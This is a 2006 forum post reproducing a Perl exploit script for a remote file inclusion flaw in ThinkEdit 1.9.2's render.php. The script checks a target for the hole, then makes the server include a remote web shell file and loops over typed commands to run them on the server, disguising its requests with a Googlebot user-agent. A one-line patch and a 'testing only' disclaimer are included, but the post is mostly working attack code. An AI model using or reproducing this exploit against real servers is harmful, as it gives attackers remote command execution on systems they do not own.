Don Posted December 8, 2006 Report Posted December 8, 2006 ################################################################################################## r0ut3r Presents... ## ## Another r0ut3r discovery! ## writ3r [at] gmail.com ## ## ThinkEdit Remote File Inclusion Exploit ################################################################################################### Software: ThinkEdit 1.9.2 ## ## Vendor: [url]http://www.thinkedit.org/[/url] ## ## Released: 2006/12/08 ## ## Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) ## ## Note: The information provided in this document is for ThinkEdit administrator ## testing purposes only! ## ## Solution: ## Add the below code to the top of render.php ## if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) ## die(); ## ## Exploit: ## perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd ## ## design/thinkedit/render.php?template_file= ############################################################################################################################################################################### Remote File Inclusion Exploiter ## ## This script attempts to exploit a remote file include vulnerability ## by inserting a web shell into an include statement. A shell is then ## spawned. ## ## Created By r0ut3r (writ3r [at] gmail.com) #############################################################################use IO::Socket;$port = "80"; # connection port$target = @ARGV[0]; # localhost$folder = @ARGV[1]; # /think/$shellloc = @ARGV[2]; # [url]http://localhost/cmd.txt[/url]$cmdv = @ARGV[3]; # cmd$vulnerable = false;$s = true;sub Header(){ print q {Remote File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com)-------------------------------------------------------------------};}sub Usage(){ print q {Usage: think.pl [target] [directory] [shell_loc] [cmd_variable]perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd}; exit();}Header();if (!$target || !$folder || !$shellloc || !$cmdv) { Usage(); }if ($s eq false) { print "[-] Shell not foundn"; exit(); }# Check if the script is vulnerable and register_globals are on (if needed)$vulnc = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn";print $vulnc "GET ".$folder."render.php?template_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1n";print $vulnc "Host: $targetn";print $vulnc "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n";print $vulnc "Accept: text/htmln";print $vulnc "Connection: keep-alivenn";while (<$vulnc>) { if (/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/) { $vulnerable = true; }}if ($vulnerable eq false) { print "[-] Target not vulnerable, or register_globals could be offn"; exit(); }print "[+] Starting shelln";print "[cmd]$ ";$cmd = <STDIN>;$cmd =~ s/ /%20/g;while ($cmd !~ "exit"){ $xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn"; print $xpack "GET ".$folder."render.php?template_file=".$shellloc."&".$cmdv."=".substr($cmd, 0, -1)." HTTP/1.1n"; print $xpack "Host: $targetn"; print $xpack "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n"; print $xpack "Accept: text/htmln"; print $xpack "Connection: keep-alivenn"; print "[cmd]$ "; $cmd = <STDIN>;}print "[!] Connection to host lost...n"; Quote
